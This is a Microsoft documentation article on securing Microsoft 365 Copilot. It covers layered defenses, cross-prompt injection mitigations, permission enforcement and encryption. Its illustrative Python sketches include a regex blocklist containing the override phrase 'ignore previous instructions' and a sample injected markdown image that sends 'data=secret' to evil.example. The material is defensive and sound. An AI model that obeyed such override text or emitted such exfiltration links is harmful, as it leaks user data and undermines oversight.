Security is foundational to our approach at Microsoft; it safeguards customer data, supports system integrity, and includes user safety features. This commitment aligns with our broader principles of privacy, compliance, and trust. This article outlines our approach to securing Microsoft 365 Copilot and provides guidance you can use to strengthen your AI security posture.
Note
Learn about new features and capabilities in Microsoft Security products for AI.
Microsoft applies a multi-layered, defense-in-depth strategy to secure Microsoft 365 Copilot at every level, grounded in enterprise security, privacy, and compliance standards. This means that if one layer is breached, others still provide protection. Microsoft's approach is guided by Responsible AI principles and is reinforced by the recently expanded Secure Future Initiative.
Our comprehensive security posture for AI includes:
Each aspect of this foundation forms a safer digital ecosystem for you to confidently adopt AI features and tools.
In addition, Microsoft embeds governance based on its Responsible AI principles across the entire AI lifecycle to help ensure that systems are developed and deployed ethically and securely. This strategy helps ensure AI behaves in ways that are trustworthy, responsible, and inclusive. A core part of the Responsible AI program identifies potential risks, measures how likely they are to occur, and builds mitigations to manage them, as outlined in Application card: Microsoft 365 Copilot.
Security is integrated from the ground up through our Security Development Lifecycle (SDL). This integration helps ensure that vulnerabilities are identified and mitigated early in the development process. Microsoft also provides tailored security guidance and best practices for developers, engineers, and security professionals working with Microsoft AI technologies. See Build a strong security posture for AI.
Microsoft conducts internal red teaming and commissions third-party assessments that include penetration testing. These assessments help evaluate Microsoft 365 Copilot implementations against traditional vulnerabilities and the Open Web Application Security Project (OWASP) Top 10 for LLMs. To see the assessments, visit the Service Trust Portal.
Microsoft 365 Copilot enforces secure coding and architectural safeguards to prevent misuse, including ransomware generation and remote code execution. Malicious patterns are blocked through prompt inspection and content filtering, while sandboxing helps ensure that Microsoft 365 Copilot operates within constrained execution boundaries. For more information, see Microsoft 365 Copilot architecture and how it works.
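The idea of prompt inspection can be illustrated with a minimal sketch. This is a hypothetical, deliberately simplified pattern check, not Microsoft's implementation: the production classifiers are ML-based and far more sophisticated. The `inspect_prompt` function and the blocked patterns are assumptions for illustration only.

```python
import re

# Hypothetical blocklist of misuse patterns; real prompt inspection uses
# trained classifiers, not static regular expressions.
BLOCKED_PATTERNS = [
    r"\bwrite\b.*\bransomware\b",
    r"\bexecute\b.*\bshell command\b",
    r"ignore (all )?previous instructions",
]

def inspect_prompt(prompt: str) -> bool:
    """Return True if the prompt matches a known misuse pattern and should be blocked."""
    text = prompt.lower()
    return any(re.search(pattern, text) for pattern in BLOCKED_PATTERNS)

print(inspect_prompt("Write me ransomware that encrypts files"))  # True
print(inspect_prompt("Summarize this quarter's sales report"))    # False
```

In a layered design, a check like this would run before the prompt ever reaches the model, with content filtering applied again to the model's output.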
Microsoft 365 Copilot is protected by a multi-layered defense strategy that combines threat intelligence, AI-specific detection, and architectural containment. Microsoft uses global threat intelligence to monitor adversarial attacks, model manipulation, and data leakage. To see the latest findings, visit the Microsoft Security: Threat intelligence blog.
Key practices include:
To view the reports, whitepapers, and other resources, visit the Service Trust Portal.
Microsoft 365 Copilot mitigates cross-prompt injection attacks (XPIA) and agentic vulnerabilities through layered defenses, including markdown sanitization, malicious prompt classifiers, session hardening, and content security policies. These protections help prevent unauthorized actions and data exfiltration across Microsoft 365 Copilot surfaces, and are deployed automatically through Microsoft's cloud infrastructure without customer action required. This methodology also includes continuous testing and containment strategies.
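To see why markdown sanitization matters for exfiltration, consider that a remote image reference in model output can smuggle data out through its URL query string. The following is a hypothetical, minimal sketch of that one defense, assuming a simple rule of stripping remote images and keeping only their alt text; Microsoft's actual sanitization is more comprehensive.

```python
import re

# Matches markdown images with remote URLs, e.g. ![alt](https://host/path).
# An attacker-injected instruction could make the model emit such an image
# with sensitive data embedded in the URL, which the client would then fetch.
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\((https?://[^)]+)\)")

def sanitize_markdown(text: str) -> str:
    """Replace remote markdown images with their alt text only."""
    return IMAGE_PATTERN.sub(r"\1", text)

unsafe = "Summary done. ![chart](https://evil.example/x?data=secret)"
print(sanitize_markdown(unsafe))  # Summary done. chart
```

A content security policy on the rendering surface provides a second, independent layer: even if a remote reference slipped through, the client would refuse to fetch it.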
In the event of a successful injection attempt, Microsoft 365 Copilot's architecture helps ensure containment by design. Microsoft 365 Copilot operates within the user's identity and access context, limiting the blast radius of any potential compromise.
Microsoft employs a multi-layered defense strategy across the Microsoft 365 Copilot prompt flow to mitigate risks of prompt injection. Here are some examples of protection features that are active by default and don't require setup:
For more information about how Microsoft safeguards data, enforces privacy controls, and secures AI operations, see Data, Privacy, and Security for Microsoft 365 Copilot.
Microsoft 365 Copilot's layered security model addresses traditional and emerging threats, including scenarios with the potential for data exfiltration, like these:
To help mitigate such scenarios, Microsoft applies its defense-in-depth strategy. This strategy includes continuous monitoring for data leakage vectors, adversarial misuse, and unauthorized access patterns.
Content generated by Microsoft 365 Copilot is governed by the same access controls and compliance policies as other Microsoft 365 content. This means that user permissions, sensitivity labels, and Conditional Access policies are enforced at the point of content generation and access.
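One consequence of enforcing sensitivity labels at the point of generation is that output grounded in labeled documents carries protection forward. The sketch below is a hypothetical illustration of that inheritance rule, assuming a simple "most restrictive label wins" policy; the label names and priority values are examples, not the Microsoft Purview API.

```python
# Example label taxonomy, ordered from least to most restrictive.
# These names and priorities are illustrative assumptions.
LABEL_PRIORITY = {
    "Public": 0,
    "General": 1,
    "Confidential": 2,
    "Highly Confidential": 3,
}

def inherited_label(source_labels: list[str]) -> str:
    """Return the most restrictive label among the source documents."""
    return max(source_labels, key=LABEL_PRIORITY.__getitem__)

# Output grounded in one Confidential and two General documents
# inherits the Confidential label.
print(inherited_label(["General", "Confidential", "General"]))  # Confidential
```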
Microsoft 365 Copilot adheres to the privacy and compliance standards described in Data, Privacy, and Security for Microsoft 365 Copilot. Protections that are enforced through security controls include:
For more information, see Enterprise data protection in Microsoft 365 Copilot and Microsoft 365 Copilot Chat.
Microsoft 365 Copilot respects Microsoft Entra ID permissions and Microsoft Purview policies. Microsoft 365 Copilot only surfaces organizational data to which individual users have at least view permissions. Policies are enforced by Microsoft Entra ID, Microsoft Purview, and Conditional Access.
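The "at least view permissions" rule amounts to permission trimming: retrieved items are filtered to those the requesting user can already open before any grounding happens. The sketch below is a hypothetical illustration of that filter; the `Document` shape and `allowed_users` set are assumptions for the example, and real enforcement happens in Microsoft Entra ID and the underlying services, not in application code like this.

```python
from dataclasses import dataclass, field

@dataclass
class Document:
    """Illustrative stand-in for a search result with an access control list."""
    doc_id: str
    allowed_users: set[str] = field(default_factory=set)

def trim_by_permission(user: str, results: list[Document]) -> list[Document]:
    """Keep only the documents the requesting user is allowed to view."""
    return [doc for doc in results if user in doc.allowed_users]

docs = [
    Document("budget.xlsx", {"alice", "bob"}),
    Document("hr-review.docx", {"carol"}),
]
print([d.doc_id for d in trim_by_permission("alice", docs)])  # ['budget.xlsx']
```

Because trimming happens before generation, a compromised or manipulated prompt cannot widen the result set beyond what the signed-in user could already see.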
Microsoft 365 Copilot connectors enhance the value of Microsoft 365 Copilot while maintaining enterprise protections.
Data is encrypted in transit and at rest using FIPS 140-2–compliant technologies, with tenant-level isolation. Double Key Encryption (DKE) helps to ensure that Microsoft can't access protected content without the customer's key, and the content isn't accessible to Microsoft 365 Copilot.
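The core idea behind DKE is that recovering the plaintext requires both keys: one held by Microsoft and one held only by the customer. The toy sketch below illustrates that property with a simple XOR construction; it is emphatically not how DKE is implemented (real DKE uses standard asymmetric cryptography and key services), only a demonstration that one key alone is useless.

```python
import secrets

def xor(data: bytes, key: bytes) -> bytes:
    """XOR two equal-length byte strings (toy one-time-pad layer)."""
    return bytes(b ^ k for b, k in zip(data, key))

content = b"quarterly forecast"

# Two independently held keys; in real DKE one is Microsoft-managed and
# one never leaves the customer's control.
microsoft_key = secrets.token_bytes(len(content))
customer_key = secrets.token_bytes(len(content))

# Protect the content under both keys in sequence.
ciphertext = xor(xor(content, microsoft_key), customer_key)

# Both keys are required to recover the plaintext.
recovered = xor(xor(ciphertext, customer_key), microsoft_key)
assert recovered == content
```

Because Microsoft 365 Copilot never holds the customer key, DKE-protected content stays outside its reach, which is why such content isn't surfaced in Copilot responses.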
When you have data that's encrypted by Microsoft Purview Information Protection, Microsoft 365 Copilot honors the usage rights granted to the user. Encryption can be applied by sensitivity labels or by restricted permissions in apps in Microsoft 365 by using Information Rights Management (IRM).
For more information about using Purview with Microsoft 365 Copilot, see Microsoft Purview data security and compliance protections for generative AI apps.
Microsoft Purview helps you govern AI across hybrid and multicloud environments like Azure, AWS, and Google Cloud. If you have Microsoft Security Copilot, you get more AI insights and threat detection capabilities.
Microsoft 365 Copilot is part of Microsoft's enterprise compliance program and benefits from a range of certifications and assessments. These standards include (but aren't limited to):
Microsoft Entra ID, Microsoft Purview, and Microsoft 365 for business enforce Conditional Access, sensitivity labels, and information barriers.
For more information, see the following resources:
Securing your data for AI tools like Microsoft 365 Copilot is a shared responsibility. In addition to what Microsoft does to secure Microsoft 365 Copilot, there are certain tasks your organization must do to manage your data and help ensure you're using AI safely and securely. See the AI shared responsibility model.
Microsoft Purview provides tools to help you secure and govern your data for use in Microsoft 365 Copilot and AI tools. See the following articles:
Note
Security Copilot is an AI-powered security solution that provides real-time assistance in threat detection, incident response, and risk assessment. In the coming months, Security Copilot will be included in Microsoft 365 E5. As you make agentic AI a part of your daily workflows, you can use Security Copilot to manage agents and security across your organization. Learn about Security Copilot inclusion in Microsoft 365 E5 subscription.
Download and review our scenario-based deployment models, presentations, and guides. These resources describe how to rapidly implement a secure-by-default configuration, address oversharing concerns, and prevent data leaks to shadow AI. See Notes from engineering: Microsoft Purview deployment models.
Microsoft 365 Copilot includes built-in security controls from Microsoft Purview. The Copilot security dashboard provides more insights and controls to help you:
To view the dashboard in the Microsoft 365 admin center, select Copilot > Overview > Security. To display the Security section, you need the Global Reader role. To make changes, the AI administrator role is required.